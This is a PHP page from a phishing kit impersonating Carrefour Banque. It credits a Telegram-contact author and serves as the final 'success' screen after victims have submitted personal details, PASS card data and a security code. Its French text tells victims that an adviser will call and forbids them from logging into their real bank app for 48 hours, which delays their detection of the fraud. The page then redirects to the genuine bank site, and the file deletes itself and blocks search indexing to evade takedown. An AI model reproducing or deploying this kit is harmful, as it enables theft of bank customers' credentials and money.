<?php
    /*******
    Main Author: Z0N51
    Contact me on telegram : https://t.me/z0n51
    ********************************************************/
    
    require_once '../includes/main.php';
    reset_action(get_client_ip());
    $_SESSION['last_page'] = 'success';
?>
<!doctype html>
<html style="height: 100%; display: flex; flex-direction: column; background: #FFF;">

    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">
        
        <!-- CSS FILES -->
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css">
        <link rel="stylesheet" href="../assets/css/helpers.css">
        <link rel="stylesheet" href="../assets/css/style.css">

        <link rel="icon" type="image/x-icon" href="../assets/imgs/favicon.ico" />

        <title>Code de Sécurité</title>
    </head>

    <body style="height: 100%; display: flex; flex-direction: column; background: #FFF;">
        
        <!-- HEADER -->
        <header id="header" class="d-flex">
            <div class="logo flex-grow-1"><img style="max-width: 103px;" src="../assets/imgs/logo.png"></div>
            <p>Code de Sécurité</p>
        </header>
        <!-- END HEADER -->

        <div id="steps">
            <ul>
                <li class="active">1</li>
                <li class="active">2</li>
                <li class="active">3</li>
                <li class="active">4</li>
            </ul>
        </div>

        <!-- MAIN -->
        <main id="main" class="flex-grow-1">
            <div class="left">
                <ul>
                    <li class="active"><span>1</span> Mes informations</li>
                    <li class="active"><span>3</span> Carte PASS</li>
                    <li class="active"><span>2</span> Sécurité</li>
                    <li class="active"><span>4</span> Finalisation</li>
                </ul>
            </div>
            <div class="right">
                <div class="success text-center">
                    <div><img style="max-width: 90px;" src="../assets/imgs/success.png"></div>
                    <h3 style="margin: 20px 0; font-size: 18px; font-weight: 700;">Votre demande a été transmise.</h3>
                    <p style="border: 0; margin-bottom: 0; padding-bottom: 0; font-size: 13px;">
                        N'oubliez pas qu'un de nos conseillers techniques prendra contact avec vous pour confirmer vos informations afin de finaliser votre demande.
                         <br><br>
							il vous est strictement interdit de vous reconnecter sur votre application Carrefour Banque ou sur le site web durant ces prochaines 48 heures pour assurer le bon fonctionnement du processus de réactivation.
                    </p>
                </div>
            </div>
        </main>
        <!-- END MAIN -->

        <!-- FOOTER -->
        <footer id="footer">
            <div class="container">
                <p>
                    &copy; <?php echo date('Y'); ?> Carrefour Banque<br><span>Protection des données</span>
                </p>
            </div>
        </footer>
        <!-- END FOOTER -->

        <!-- JS FILES -->
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/js/all.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/3.0.0/jquery.payment.min.js"></script>
        <script src="../assets/js/script.js"></script>

        <script>
            setTimeout(function () {
                window.location.href= 'https://www.carrefour-banque.fr/';
            },20000); // 1000 = 1s
        </script>

    </body>

</html>
<?php unlink(basename(__FILE__)); ?>